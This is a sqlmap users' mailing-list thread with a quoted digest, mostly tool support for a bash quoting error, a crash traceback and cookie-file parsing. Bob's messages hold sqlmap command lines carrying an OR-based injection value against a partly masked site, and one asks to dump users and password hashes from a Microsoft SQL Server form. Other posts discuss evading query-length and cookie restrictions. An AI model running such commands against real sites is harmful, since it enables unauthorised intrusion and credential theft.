Re: [sqlmap-users] Reply: sqlmap-user event not found error
From: Miroslav S. <mir...@gm...> - 2014-05-13 13:40:33
Hi Bob.

It's a bash problem (reproduced it this moment). Using single quotes (') instead of double quotes (") should solve this issue.

Kind regards,
Miroslav Stampar

On Tue, May 13, 2014 at 5:05 AM, Bob <sto...@qq...> wrote:
>
> Hi Miroslav,
>
> Thanks for your email,
>
> but still the same after i tried sqlmap -u ".."
>
>
>
> sqlmap -u "
> http://www.xxxx.com/xxx/xxxx/default!search.do?keyword=&toUrl=http%3A%2F%2Fwww.diylooks.com%2Foem%2Fproduct%2Fdefault%21view.do%3Fid%3D270549&qty=1&input_mailbar=98%22%20OR%20%2298%22%3D%2298&input_mail=aa
> "
> bash: !search.do?keyword=: event not found
>
>
> best regards
> bob
> ------------------
>
>
>
>
> ------------------ Original Message ------------------
> *From:* "Miroslav Stampar";<mir...@gm...>;
> *Sent:* Sunday, May 11, 2014, 10:38 PM
> *To:* "Bob"<sto...@qq...>;
> *Cc:* "SqlMap List"<sql...@li...>;
> *Subject:* Re: [sqlmap-users] sqlmap-user event not found error
>
> Hi Bob.
>
> Please enclose the url part with quotes (e.g. ./sqlmap.py -u "..." ...)
>
> Kind regards,
> Miroslav Stampar
>
>
> On Sun, May 11, 2014 at 8:32 AM, Bob <sto...@qq...> wrote:
>
>> Hi friend,
>>
>> I have problem with ! inside URL .
>>
>> /sqlmap.py -u
>> http://www.xxxx.com/xxx/xxxx/default!search.do?keyword=&toUrl=http%3A%2F%2Fwww.diylooks.com%2Foem%2Fproduct%2Fdefault%21view.do%3Fid%3D270549&qty=1&input_mailbar=98%22%20OR%20%2298%22%3D%2298&input_mail=-p input_mailbar --dbms=MySQL --risk=3 --level=5 -o --param-del=
>> bash: !search.do?keyword=: event not found
>>
>> How should i do ?
>>
>> thanks
>>
>> bob
>> ------------------
>>
>>
>>
>>
>> ------------------ Original ------------------
>> *From: * "Miroslav Stampar";<mir...@gm...>;
>> *Date: * Fri, May 31, 2013 03:00 AM
>> *To: * "Bob"<sto...@qq...>;
>> *Cc: * "sqlmap-users"<sql...@li...>;
>> *Subject: * Re: [sqlmap-users] sqlmap-users Digest, Vol 31, Issue 1
>>
>> Hi.
>> Have you been able to retrieve user names normally? I mean, were they
>> normally been displayed in console output?
>> Also, is boolean technique the only one detected by sqlmap in your case
>> (or maybe UNION)?
>> Kind regards,
>> Miroslav Stampar
>>
>>
>> On Thu, May 30, 2013 at 4:57 PM, Bob <sto...@qq...> wrote:
>>
>>> Hi friend,
>>>
>>>
>>> Could you help me with this bug ?
>>>
>>>
>>> [22:54:12] [CRITICAL] unhandled exception in sqlmap/1.0-dev, retry your
>>> run with the latest development version from the GitHub repository. If the
>>> exception persists, please send by e-mail to '
>>> sql...@li...' or open a new issue at '
>>> https://github.com/sqlmapproject/sqlmap/issues/new' with the following
>>> text and any information required to reproduce the bug. The developers will
>>> try to reproduce the bug, fix it accordingly and get back to you.
>>> sqlmap version: 1.0-dev
>>> Python version: 2.7.3
>>> Operating system: posix
>>> Command line: ./sqlmap -u
>>> ***********************************************
>>> --data=__VIEWSTATE=%2FwEPDwUJNzcyNzA5MTcxD2QWAmYPZBYCAgMPZBYCAgUPZBYCAg8PPCsAEQIADxYEHgtfIURhdGFCb3VuZGceC18hSXRlbUNvdW50ZmQBEBYAFgAWAGQYAQUaY3RsMDAkTWFpbkNvbnRlbnQkRGdSZXN1bHQPPCsADAEIZmTqSkxVHfCvk8H514IG2vidRqlanHHD7kZRl389CeOupw%3D%3D&__EVENTVALIDATION=%2FwEWCAK%2BjdvyCQLM8NjFBQKgo%2F%2FzCgKumJP3BALizcLsAwL%2Bq8zvCgKsq6%2F4DwLTytO4BPwtq4Qe7jKJMNFTIKI0vDR6PinuEV%2BLf13FWcmth6Av&ctl00%24MainContent%24TxtContCode=ZAP&ctl00%24MainContent%24TxtItemCode=ZAP&ctl00%24MainContent%24BtnFind=%E6%9F%A5%E8%AF%A2&ctl00%24MainContent%24TxtTestCustname=ZAP&ctl00%24MainContent%24TxtItemName=ZAP&ctl00%24MainContent%24TxtCheckManuCrock=ZAP&ctl00%24MainContent%24TxtCheckNo=ZAP
>>> -p ctl00%24MainContent%24TxtContCode -o --level 3 --risk 5 --dbms=Microsoft
>>> SQL Server --users --passwords
>>> Technique: BOOLEAN
>>> Back-end DBMS: Microsoft SQL Server (fingerprinted)
>>> Traceback (most recent call last):
>>> File "./sqlmap", line 87, in main
>>> start()
>>> File "/usr/share/sqlmap/lib/controller/controller.py", line 572, in start
>>> action()
>>> File "/usr/share/sqlmap/lib/controller/action.py", line 81, in action
>>> conf.dbmsHandler.getPasswordHashes(), "password hash",
>>> CONTENT_TYPE.PASSWORDS)
>>> File "/usr/share/sqlmap/plugins/generic/users.py", line 243, in
>>> getPasswordHashes
>>> if user in retrievedUsers:
>>> TypeError: unhashable type: 'list'
>>>
>>> [*] shutting down at 22:54:12
>>> Thanks
>>>
>>> BOB
>>>
>>>
>>> ------------------ Original ------------------
>>> *From: * "sqlmap-users-request"<
>>> sql...@li...>;
>>> *Date: * May 29, 2013
>>> *To: * "sqlmap-users"<sql...@li...>;
>>> *Subject: * sqlmap-users Digest, Vol 31, Issue 1
>>>
>>> Send sqlmap-users mailing list submissions to
>>> sql...@li...
>>>
>>> To subscribe or unsubscribe via the World Wide Web, visit
>>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>>> or, via email, send a message with subject or body 'help' to
>>> sql...@li...
>>>
>>> You can reach the person managing the list at
>>> sql...@li...
>>>
>>> When replying, please edit your Subject line so it is more specific
>>> than "Re: Contents of sqlmap-users digest..."
>>>
>>>
>>> Today's Topics:
>>>
>>> 1. Re: Feature request (David Guimaraes)
>>> 2. Re: --load-cookies (Dirk Wetter)
>>> 3. Re: --load-cookies (Miroslav Stampar)
>>> 4. Re: Patch for /task/<task_id>/delete in clean_filesystem
>>> (Miroslav Stampar)
>>> 5. Re: --load-cookies (Dirk Wetter)
>>> 6. --host parameter (co...@5i...)
>>> 7. Sqlmap and direct connect error (???????? ??????)
>>> 8. Re: --host parameter (Miroslav Stampar)
>>> 9. Re: Sqlmap and direct connect error (Miroslav Stampar)
>>> 10. feature request: offline mode for --dns-domain? (buawig)
>>> 11. feature request: --dns-domain for non-root users (--dns-port)
>>> (buawig)
>>> 12. Domain credentials (Brian Milliron)
>>> 13. Re: Domain credentials (Brandon Perry)
>>> 14. Re: feature request: offline mode for --dns-domain?
>>> (Miroslav Stampar)
>>> 15. Re: Domain credentials (Miroslav Stampar)
>>> 16. Re: feature request: fetch DNS queries from DNS server via
>>> HTTP (buawig)
>>> 17. Re: feature request: fetch DNS queries from DNS server via
>>> HTTP (Miroslav Stampar)
>>> 18. MySQL error based technique bug (Konrads Smelkovs)
>>> 19. Re: MySQL error based technique bug (Miroslav Stampar)
>>> 20. SQLmap crashing (Phillip Wylie)
>>> 21. Re: SQLmap crashing (Miroslav Stampar)
>>> 22. Custom injection payload in POST (Marcell Fodor)
>>> 23. Re: SQLmap crashing (Miroslav Stampar)
>>> 24. I got error on windows (warezhacking)
>>> 25. Appending to a dump (Stephen Shkardoon)
>>> 26. Re: Appending to a dump (Miroslav Stampar)
>>> 27. Re: Appending to a dump (Stephen Shkardoon)
>>> 28. Re: Appending to a dump (Miroslav Stampar)
>>> 29. --ignore-404 ? (buawig)
>>> 30. PostgreSQL: substr('string', 1, 1) vs. substring('string'
>>> from 1 for 1) (buawig)
>>> 31. Re: PostgreSQL: substr('string', 1, 1) vs. substring('string'
>>> from 1 for 1) (Miroslav Stampar)
>>> 32. Re: PostgreSQL: substr('string', 1, 1) vs. substring('string'
>>> from 1 for 1) (Miroslav Stampar)
>>> 33. Re: --ignore-404 ? (Miroslav Stampar)
>>> 34. BUG...!!!! o.O (Isai Ofir Juarez Contreras)
>>> 35. Re: BUG...!!!! o.O (Miroslav Stampar)
>>> 36. gun...@gm... wants to follow you. Accept?
>>> (gun...@gm...)
>>> 37. Direct access to mysql database (Marcell Fodor)
>>> 38. Re: Direct access to mysql database (Miroslav Stampar)
>>> 39. ? Sqlmap Users, Marco Mirandola ti ha inviato un messaggio...
>>> (Badoo)
>>> 40. Not getting any sensitive data from database (Marcell Fodor)
>>> 41. Re: Not getting any sensitive data from database
>>> (Miroslav Stampar)
>>> 42. unhandled exception (kvasilopoulos)
>>> 43. [SQLMAP] Unhandled exception for IPv6
>>> (e.n...@st...)
>>> 44. Re: [SQLMAP] Unhandled exception for IPv6 (Miroslav Stampar)
>>> 45. Re: unhandled exception (Miroslav Stampar)
>>> 46. Passing SOAPAction in --header (Brandon Perry)
>>> 47. Re: Passing SOAPAction in --header (Miroslav Stampar)
>>> 48. Re: [SQLMAP] Unhandled exception for IPv6 (Miroslav Stampar)
>>> 49. Blind SQL Injection question (Guy Dufour)
>>> 50. Re: Blind SQL Injection question (Chris Oakley)
>>> 51. Re: Passing SOAPAction in --header (Brandon Perry)
>>> 52. Re: Passing SOAPAction in --header (Brandon Perry)
>>> 53. Deploy&Create SSH/tunnel with compromised MSSQL server
>>> (Alok Kumar)
>>> 54. Re: Deploy&Create SSH/tunnel with compromised MSSQL server
>>> (Brandon Perry)
>>> 55. Re: Deploy&Create SSH/tunnel with compromised MSSQL server
>>> (Alok Kumar)
>>> 56. Re: Deploy&Create SSH/tunnel with compromised MSSQL server
>>> (Brandon Perry)
>>> 57. SQLMAP Bug (Joe O'Hara)
>>> 58. Re: SQLMAP Bug (Miroslav Stampar)
>>> 59. [CRITICAL] (Thai Thao)
>>> 60. Re: [CRITICAL] (Miroslav Stampar)
>>> 61. Providing multiple dbms (Sebastian Nerz)
>>> 62. Re: Providing multiple dbms (Miroslav Stampar)
>>>
>>>
>>> ----------------------------------------------------------------------
>>>
>>> Message: 1
>>> Date: Sat, 13 Apr 2013 21:40:39 -0300
>>> From: David Guimaraes <sk...@gm...>
>>> Subject: Re: [sqlmap-users] Feature request
>>> To: Miroslav Stampar <mir...@gm...>
>>> Cc: SqlMap List <sql...@li...>
>>> Message-ID:
>>> <CAJ...@ma...>
>>> Content-Type: text/plain; charset="iso-8859-1"
>>>
>>> Good question Miroslav.. I tried to think in something that can be
>>> implemented without ruin sqlmap query schema, but I could not come to any
>>> conclusion... =(
>>>
>>> The thing is, sqlsus use a different approach to dump the data, making
>>> this
>>> kind of thing possible...
>>>
>>> The solution that I found in this particular scenario is to use sqlsus,
>>> unfortunately...
>>>
>>> Regards.
>>>
>>> David
>>>
>>>
>>> On Mon, Apr 1, 2013 at 6:35 PM, Miroslav Stampar <
>>> mir...@gm...
>>> > wrote:
>>>
>>> > Hi David.
>>> >
>>> > And what do you recommend to be done in case of query with length >
>>> > max_inj_length?
>>> >
>>> > Kind regards,
>>> > Miroslav Stampar
>>> > On Apr 1, 2013 11:14 PM, "David Guimaraes" <sk...@gm...> wrote:
>>> >
>>> >> Hi, I am trying to perform sql injection on a web site but I can not
>>> get
>>> >> successful due to a size limitation on the query sent to the server.
>>> The
>>> >> server is limiting the size of query in 512 bytes only and sqlmap do
>>> not
>>> >> have any customization that allows me to bypass this restriction like
>>> >> sqlsus "max_inj_length" parameter. Sqlsus has a feature called
>>> "autoconf"
>>> >> that measure the permitted query size.
>>> >>
>>> >> There is some chance to put this kind of feature in sqlmap?
>>> >>
>>> >> Thanks.
>>> >>
>>> >> --
>>> >> David Gomes Guimarães
>>> >>
>>> >>
>>> >>
>>> ------------------------------------------------------------------------------
>>> >> Own the Future-Intel® Level Up Game Demo Contest 2013
>>> >> Rise to greatness in Intel's independent game demo contest.
>>> >> Compete for recognition, cash, and the chance to get your game
>>> >> on Steam. $5K grand prize plus 10 genre and skill prizes.
>>> >> Submit your demo by 6/6/13. http://p.sf.net/sfu/intel_levelupd2d
>>> >> _______________________________________________
>>> >> sqlmap-users mailing list
>>> >> sql...@li...
>>> >> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>>> >>
>>> >>
>>>
>>>
>>> --
>>> David Gomes Guimarães
>>> -------------- next part --------------
>>> An HTML attachment was scrubbed...
>>>
>>> ------------------------------
>>>
>>> Message: 2
>>> Date: Mon, 15 Apr 2013 11:36:37 +0200
>>> From: Dirk Wetter <sp...@dr...>
>>> Subject: Re: [sqlmap-users] --load-cookies
>>> To: Miroslav Stampar <mir...@gm...>
>>> Cc: SqlMap List <sql...@li...>
>>> Message-ID: <516...@dr...>
>>> Content-Type: text/plain; charset=ISO-8859-1
>>>
>>>
>>>
>>> On 04/14/2013 01:14 AM, Miroslav Stampar wrote:
>>> > Nevertheless, with the latest commit that check should be
>>> "neutralized" now. Could you please retry it now?
>>>
>>> thx, Miroslav. I tried (b6fee63) but this time the cookie parser lib
>>> hiccups, using the same file:
>>>
>>> /usr/lib64/python2.7/_MozillaCookieJar.py:109: UserWarning: cookielib
>>> bug!
>>> Traceback (most recent call last):
>>> File "/usr/lib64/python2.7/_MozillaCookieJar.py", line 82, in
>>> _really_load
>>> assert domain_specified == initial_dot
>>> AssertionError
>>>
>>> _warn_unhandled_exception()
>>> [11:13:26] [CRITICAL] there was a problem loading cookies file ('invalid
>>> Netscape format cookies file '/tmp/sqlmapcj-pbP7P1':
>>> '<FQDN>\tTRUE\t<PATH>\tTRUE\t9999999999\tJSESSIONID\t6ADFAA167AA89CF993061E5CACEF46C9'')
>>>
>>> the 999.. looks strange to me.
>>>
>>> >
>>> >
>>> > On Sun, Apr 14, 2013 at 12:59 AM, Miroslav Stampar <
>>> mir...@gm... <mailto:mir...@gm...>> wrote:
>>> >
>>> > Hi Dirk.
>>> >
>>> > Well, I would say that you have an expired cookie. Do you see that
>>> value 0? That value should be a valid UNIX time representing time of cookie
>>> expiration. Also, I've just tested that cookie of yours and sqlmap says:
>>> "[WARNING] cookie '....' has expired"
>>> >
>>>
>>> that's true but IMO 0 represents just a session cookie. Example:
>>>
>>> prompt% wget -q -O /dev/null --keep-session-cookies
>>> --save-cookies=/dev/stdout bing.com
>>> # HTTP cookie file.
>>> # Generated by Wget on 2013-04-15 11:23:13.
>>> # Edit at your own risk.
>>>
>>> .bing.com TRUE / FALSE 1429089794 SRCHUSR
>>> AUTOREDIR=0&GEOVAR=&DOB=20130415
>>> .bing.com TRUE / FALSE 1429089794 SRCHD D=2781203&MS=2781203&AF=NOFORM
>>> .bing.com TRUE / FALSE 1429089794 OrigMUID
>>> 333995A69E06630B2EB491169F016314%2cfc3b876c239e43d4bfc1544927289abe
>>> .bing.com TRUE / FALSE 1429089794 MUID 333995A69E06630B2EB491169F016314
>>> .bing.com TRUE / FALSE 0 _SS SID=B954CB7EDF8643CABAD8013F27A241E7
>>> .bing.com TRUE / FALSE 0 _HOP
>>> .bing.com TRUE / FALSE 0 _FS NU=1
>>> .bing.com TRUE / FALSE 1429089794 _FP EM=1
>>> www.bing.com FALSE / FALSE 1429089794 SRCHUID
>>> V=2&GUID=975091780DFF407DA9DD07139FD97C4D
>>> www.bing.com FALSE / FALSE 1429089794 MUIDB
>>> 333995A69E06630B2EB491169F016314
>>>
>>> prompt%
>>>
>>> Same parser problem btw if I edit the cookie file and put 1429089794
>>> unix time instead of 0 in there.
>>>
>>> Ok: With the prev rev ed5599f it reads this file ok (no session cookies
>>> but cookies w/ expiration date) and uses the last
>>> cookie only for the first 120 tries.
>>>
>>> Cheers, Dirk
>>>
>>>
>>> >
>>> > Kind regards,
>>> > Miroslav Stampar
>>> >
>>> >
>>> > On Sat, Apr 13, 2013 at 12:54 PM, Dirk Wetter <sp...@dr...<mailto:
>>> sp...@dr...>> wrote:
>>> >
>>> >
>>> > Hi Miroslav,
>>> >
>>> > thx for your prompt answer.
>>> >
>>> > On 04/12/2013 07:45 PM, Miroslav Stampar wrote:
>>> > > Hi Dirk.
>>> > >
>>> > > Could you please get the latest revision and retry it again?
>>> > ed5599f: almost the same: with cookie in the header sqlmap takes only
>>> this one.
>>> > The slight difference seems to be that in the case where I didn't
>>> supply a cookie
>>> > sqlmap doesn't use any cookie at all, i.e. now not the one from the
>>> server anymore.
>>> > >
>>> > > There was a situation where info messages have been wrongly written
>>> that original response contained Set-Cookie in situations like yours.
>>> > >
>>> > > In case that everything stays as it is, I'll need to ask you to
>>> provide more details. For example, cookie file would be great.
>>> >
>>> > sure, here you go:
>>> >
>>> > --snip
>>> > # Netscape HTTP Cookie File
>>> > <FQDN> \t FALSE \t <path> \t TRUE \t 0 \t JSESSIONID \t <Cookie>
>>> > [..]
>>> > --snap
>>> >
>>> > They are all session cookies. For easier reading here I put some
>>> blanks in the line
>>> > above, in "cookie-file" there aren't any though. Cookies were
>>> generated with
>>> > stompy and a shell script (looks the same as with
>>> > wget -S -O /dev/null --keep-session-cookies --save-cookies=<file>
>>> <URL>)
>>> >
>>> > Again: sqlmap doesn't hiccup/complain while eating my cookies file ;-)
>>> >
>>> > >
>>> > > Also, please make sure that the cookie file contains proper
>>> cookie(s) - domain name should be the same as a domain of target, cookie
>>> needs to have a proper valid time, etc.
>>> >
>>> > see above.
>>> >
>>> > Cheers,
>>> >
>>> > Dirk
>>> >
>>> > >
>>> > >
>>> > > On Fri, Apr 12, 2013 at 4:50 PM, Dirk Wetter <sp...@dr...<mailto:
>>> sp...@dr...> <mailto:sp...@dr... <mailto:sp...@dr...>>>
>>> wrote:
>>> > >
>>> > > Hi Miroslav,
>>> > >
>>> > > yes unfortunately.
>>> > >
>>> > > If I omit the cookie line in the request header completely, sqlmap
>>> > > seems to take the first cookie issued by the server with set-cookie
>>> (and
>>> > > puts it silently in).
>>> > >
>>> > > Cheers,
>>> > >
>>> > > Dirk
>>> > >
>>> > >
>>> > >
>>> > > On 04/12/2013 03:24 PM, Miroslav Stampar wrote:
>>> > > > Hi.
>>> > > >
>>> > > > And this is also happening if you are skipping "Cookie:
>>> JSESSIONID=C2E79FD79E967D3E3BA52EE67F8824D7" from the original request?
>>> > > >
>>> > > > Kind regards,
>>> > > > Miroslav Stampar
>>> > > >
>>> > > >
>>> > > > On Fri, Apr 12, 2013 at 3:10 PM, Dirk Wetter <sp...@dr...<mailto:
>>> sp...@dr...> <mailto:sp...@dr... <mailto:sp...@dr...>>
>>> <mailto:sp...@dr... <mailto:sp...@dr...> <mailto:
>>> sp...@dr... <mailto:sp...@dr...>>>> wrote:
>>> > > >
>>> > > >
>>> > > > Hi folks,
>>> > > >
>>> > > > .... that doesn't work for me. It always uses the cookie supplied
>>> > > > (below in $REQUEST, or if I omit the line in $REQUEST the one
>>> > > > from the 1st server reply is being used)
>>> > > >
>>> > > > So what is wrong in here:
>>> > > >
>>> > > > cd ~/networking/tools/sqlmap/sqlmap-dev1.0-dev-ea12cce
>>> > > > ./sqlmap.py --ignore-proxy --force-ssl --beep \
>>> > > > --threads=8 -v 6 --load-cookies=$WD/cookie-file \
>>> > > > --level=2 --risk=2 -r $REQUEST
>>> > > >
>>> > > > The content of the file $REQUEST is:
>>> > > >
>>> > > > POST <URL> HTTP/1.1
>>> > > > Host: <HOST>
>>> > > > User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US)
>>> AppleWebKit/525.13 (KHTML, like Gecko)
>>> > > > Chrome/0.2.149.6 <http://0.2.149.6> <http://0.2.149.6> <
>>> http://0.2.149.6> Safari/525.13
>>> > > > Accept:
>>> text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
>>> > > > Accept-Language: en-US,en;q=0.5
>>> > > > Accept-Encoding: gzip, deflate
>>> > > > Referer: <Referer>
>>> > > > Cookie: JSESSIONID=C2E79FD79E967D3E3BA52EE67F8824D7
>>> > > > Connection: keep-alive
>>> > > > Content-Type: application/x-www-form-urlencoded
>>> > > > Content-Length: 67
>>> > > >
>>> > > > <abunchofpostparams>
>>> > > >
>>> > > >
>>> > > > No hints that cookie-file is not in correct format (I've been
>>> through this,
>>> > > > at least I think I so ;) ).
>>> > > >
>>> > > > Any insight would be much appreciated.
>>> > > >
>>> > > >
>>> > > > Cheers,
>>> > > >
>>> > > > Dirk
>>> > > >
>>> > > >
>>> > > >
>>> ------------------------------------------------------------------------------
>>> > > > Precog is a next-generation analytics platform capable of advanced
>>> > > > analytics on semi-structured data. The platform includes APIs for
>>> building
>>> > > > apps and a phenomenal toolset for data science. Developers can use
>>> > > > our toolset for easy data analysis & visualization. Get a free
>>> account!
>>> > > > http://www2.precog.com/precogplatform/slashdotnewsletter
>>> > > > _______________________________________________
>>> > > > sqlmap-users mailing list
>>> > > > sql...@li... <mailto:
>>> sql...@li...> <mailto:
>>> sql...@li... <mailto:
>>> sql...@li...>> <mailto:
>>> sql...@li... <mailto:
>>> sql...@li...> <mailto:
>>> sql...@li... <mailto:
>>> sql...@li...>>>
>>> > > > https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>>> > > >
>>> > > >
>>> > > >
>>> > > >
>>> > > > --
>>> > > > Miroslav Stampar
>>> > > > http://about.me/stamparm
>>> > >
>>> > >
>>> > >
>>> > >
>>> > > --
>>> > > Miroslav Stampar
>>> > > http://about.me/stamparm
>>> >
>>> >
>>> >
>>> >
>>> > --
>>> > Miroslav Stampar
>>> > http://about.me/stamparm
>>> >
>>> >
>>> >
>>> >
>>> > --
>>> > Miroslav Stampar
>>> > http://about.me/stamparm
>>>
>>>
>>>
>>>
>>> ------------------------------
>>>
>>> Message: 3
>>> Date: Mon, 15 Apr 2013 11:45:19 +0200
>>> From: Miroslav Stampar <mir...@gm...>
>>> Subject: Re: [sqlmap-users] --load-cookies
>>> To: Dirk Wetter <sp...@dr...>
>>> Cc: SqlMap List <sql...@li...>
>>> Message-ID:
>>> <CA+9yoX0yAGFkCiLuycVqdbm8jvnMeEPgJdXoYZi_4NTW-YQo=Q...@ma...>
>>> Content-Type: text/plain; charset="iso-8859-1"
>>>
>>> Hi Dirk.
>>>
>>> Now that crash should be "patched".
>>>
>>> Could you please retry it now and say if the latest revision suits your
>>> needs?
>>>
>>> Kind regards,
>>> Miroslav Stampar
>>>
>>>
>>> On Mon, Apr 15, 2013 at 11:36 AM, Dirk Wetter <sp...@dr...> wrote:
>>>
>>> >
>>> >
>>> > On 04/14/2013 01:14 AM, Miroslav Stampar wrote:
>>> > > Nevertheless, with the latest commit that check should be
>>> "neutralized"
>>> > now. Could you please retry it now?
>>> >
>>> > thx, Miroslav. I tried (b6fee63) but this time the cookie parser lib
>>> > hiccups, using the same file:
>>> >
>>> > /usr/lib64/python2.7/_MozillaCookieJar.py:109: UserWarning: cookielib
>>> bug!
>>>
>>> ------------------------------
>>>
>>> Message: 4
>>> Date: Mon, 15 Apr 2013 11:46:21 +0200
>>> From: Miroslav Stampar <mir...@gm...>
>>> Subject: Re: [sqlmap-users] Patch for /task/<task_id>/delete in
>>> clean_filesystem
>>> To: Brandon Perry <bpe...@gm...>
>>> Cc: sqlmap users <sql...@li...>
>>> Message-ID:
>>> <CA+9yoX3RNQDm=PqT...@ma...>
>>> Content-Type: text/plain; charset="iso-8859-1"
>>>
>>> Hi Brandon.
>>>
>>> Thank you for your patch and find it now included [1].
>>>
>>> Kind regards,
>>> Miroslav Stampar
>>>
>>> [1]
>>>
>>> https://github.com/sqlmapproject/sqlmap/commit/8853e43616e89f26cfd6d1c1540e02ed6b4ca224
>>>
>>>
>>> On Sat, Apr 13, 2013 at 8:36 PM, Brandon Perry <
>>> bpe...@gm...>wrote:
>>>
>>> > Hi, the attached patch fixes an issue with the /task/<task_id>/delete
>>> api
>>> > call when self.output_directory is NoneType and clean_system() is
>>> called.
>>> >
>>> > --
>>> > http://volatile-minds.blogspot.com -- blog
>>> > http://www.volatileminds.net -- website
>>> >
>>> >
>>> >
>>> ------------------------------------------------------------------------------
>>> > Precog is a next-generation analytics platform capable of advanced
>>> > analytics on semi-structured data. The platform includes APIs for
>>> building
>>> > apps and a phenomenal toolset for data science. Developers can use
>>> > our toolset for easy data analysis & visualization. Get a free account!
>>> > http://www2.precog.com/precogplatform/slashdotnewsletter
>>> > _______________________________________________
>>> > sqlmap-users mailing list
>>> > sql...@li...
>>> > https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>>> >
>>> >
>>>
>>>
>>> --
>>> Miroslav Stampar
>>> http://about.me/stamparm
>>> -------------- next part --------------
>>> An HTML attachment was scrubbed...
>>>
>>> ------------------------------
>>>
>>> Message: 5
>>> Date: Mon, 15 Apr 2013 12:19:13 +0200
>>> From: Dirk Wetter <sp...@dr...>
>>> Subject: Re: [sqlmap-users] --load-cookies
>>> To: Miroslav Stampar <mir...@gm...>
>>> Cc: SqlMap List <sql...@li...>
>>> Message-ID: <516...@dr...>
>>> Content-Type: text/plain; charset=ISO-8859-1
>>>
>>> Hi Miroslav,
>>>
>>> On 04/15/2013 11:45 AM, Miroslav Stampar wrote:
>>> > Hi Dirk.
>>> >
>>> > Now that crash should be "patched".
>>> >
>>> > Could you please retry it now and say if the latest revision suits
>>> your needs?
>>>
>>> cool, thx. Works!
>>>
>>> However (sorry):
>>>
>>> One needs to omit the cookie in the request header, otherwise it just
>>> uses the one
>>> supplied by the request.
>>>
>>> Then: It doesn't change the cookie. Maybe I was interpreting that not
>>> correctly
>>> but my point was using the load-cookies option to direct sqlmap to change
>>> cookies once in a while (whenever that's gonna be). This is to circumvent
>>> restrictions one can encounter otherwise....
>>>
>>> Cheers,
>>>
>>> Dirk
>>>
>>>
>>> >
>>> > Kind regards,
>>> > Miroslav Stampar
>>> >
>>> >
>>> > On Mon, Apr 15, 2013 at 11:36 AM, Dirk Wetter <sp...@dr...<mailto:
>>> sp...@dr...>> wrote:
>>> >
>>> >
>>> >
>>> > On 04/14/2013 01:14 AM, Miroslav Stampar wrote:
>>> > > Nevertheless, with the latest commit that check should be
>>> "neutralized" now. Could you please retry it now?
>>> >
>>> > thx, Miroslav. I tried (b6fee63) but this time the cookie parser lib
>>> hiccups, using the same file:
>>> >
>>> > /usr/lib64/python2.7/_MozillaCookieJar.py:109: UserWarning: cookielib
>>> bug!
>>> > Traceback (most recent call last): >>> > File "/usr/lib64/python2.7/_MozillaCookieJar.py", line 82, in >>> _really_load >>> > assert domain_specified == initial_dot >>> > AssertionError >>> > >>> > _warn_unhandled_exception() >>> > [11:13:26] [CRITICAL] there was a problem loading cookies file >>> ('invalid Netscape format cookies file '/tmp/sqlmapcj-pbP7P1': >>> '<FQDN>\tTRUE\t<PATH>\tTRUE\t9999999999\tJSESSIONID\t6ADFAA167AA89CF993061E5CACEF46C9'') >>> > >>> > the 999.. looks strange to me. >>> > >>> > > >>> > > >>> > > On Sun, Apr 14, 2013 at 12:59 AM, Miroslav Stampar <mir...@gm...> wrote: >>> > > >>> > > Hi Dirk. >>> > > >>> > > Well, I would say that you have an expired cookie. Do you see that >>> value 0? That value should be a valid UNIX time representing time of cookie >>> expiration. Also, I've just tested that cookie of yours and sqlmap says: >>> "[WARNING] cookie '....' has expired" >>> > > >>> > >>> > that's true but IMO 0 represents just a session cookie. Example: >>> > >>> > prompt% wget -q -O /dev/null --keep-session-cookies >>> --save-cookies=/dev/stdout bing.com >>> > # HTTP cookie file. >>> > # Generated by Wget on 2013-04-15 11:23:13. >>> > # Edit at your own risk.
>>> > >>> > .bing.com TRUE / FALSE 1429089794 SRCHUSR >>> AUTOREDIR=0&GEOVAR=&DOB=20130415 >>> > .bing.com TRUE / FALSE 1429089794 SRCHD >>> D=2781203&MS=2781203&AF=NOFORM >>> > .bing.com TRUE / FALSE 1429089794 OrigMUID >>> 333995A69E06630B2EB491169F016314%2cfc3b876c239e43d4bfc1544927289abe >>> > .bing.com TRUE / FALSE 1429089794 MUID >>> 333995A69E06630B2EB491169F016314 >>> > .bing.com TRUE / FALSE 0 _SS >>> SID=B954CB7EDF8643CABAD8013F27A241E7 >>> > .bing.com TRUE / FALSE 0 _HOP >>> > .bing.com TRUE / FALSE 0 _FS NU=1 >>> > .bing.com TRUE / FALSE 1429089794 _FP EM=1 >>> > www.bing.com FALSE / FALSE 1429089794 SRCHUID >>> V=2&GUID=975091780DFF407DA9DD07139FD97C4D >>> > www.bing.com FALSE / FALSE 1429089794 MUIDB >>> 333995A69E06630B2EB491169F016314 >>> > >>> > prompt% >>> > >>> > Same parser problem btw if I edit the cookie file and put 1429089794 >>> unix time instead of 0 in there. >>> > >>> > Ok: With the prev rev ed5599f it reads this file ok (no session >>> cookies but cookies w/ expiration date) and uses the last >>> > cookie only for the first 120 tries. >>> > >>> > Cheers, Dirk >>> > >>> > >>> > > >>> > > Kind regards, >>> > > Miroslav Stampar >>> > > >>> > > >>> > > On Sat, Apr 13, 2013 at 12:54 PM, Dirk Wetter <sp...@dr...> wrote: >>> > > >>> > > >>> > > Hi Miroslav, >>> > > >>> > > thx for your prompt answer. >>> > > >>> > > On 04/12/2013 07:45 PM, Miroslav Stampar wrote: >>> > > > Hi Dirk. >>> > > > >>> > > > Could you please get the latest revision and retry it again? >>> > > ed5599f: almost the same: with cookie in the header sqlmap takes >>> only this one.
>>> > > The slight difference seems to be that in the case where I didn't >>> supply a cookie >>> > > sqlmap doesn't use any cookie at all, i.e. now not the one from the >>> server anymore. >>> > > > >>> > > > There was a situation where info messages have been wrongly >>> written that original response contained Set-Cookie in situations like >>> yours. >>> > > > >>> > > > In case that everything stays as it is, I'll need to ask you to >>> provide more details. For example, cookie file would be great. >>> > > >>> > > sure, here you go: >>> > > >>> > > --snip >>> > > # Netscape HTTP Cookie File >>> > > <FQDN> \t FALSE \t <path> \t TRUE \t 0 \t JSESSIONID \t <Cookie> >>> > > [..] >>> > > --snap >>> > > >>> > > They are all session cookies. For easier reading here I put some >>> blanks in the line >>> > > above, in "cookie-file" there aren't any though. Cookies were >>> generated with >>> > > stompy and a shell script (looks the same as with >>> > > wget -S -O /dev/null --keep-session-cookies --save-cookies=<file> >>> <URL>) >>> > > >>> > > Again: sqlmap doesn't hiccup/complain 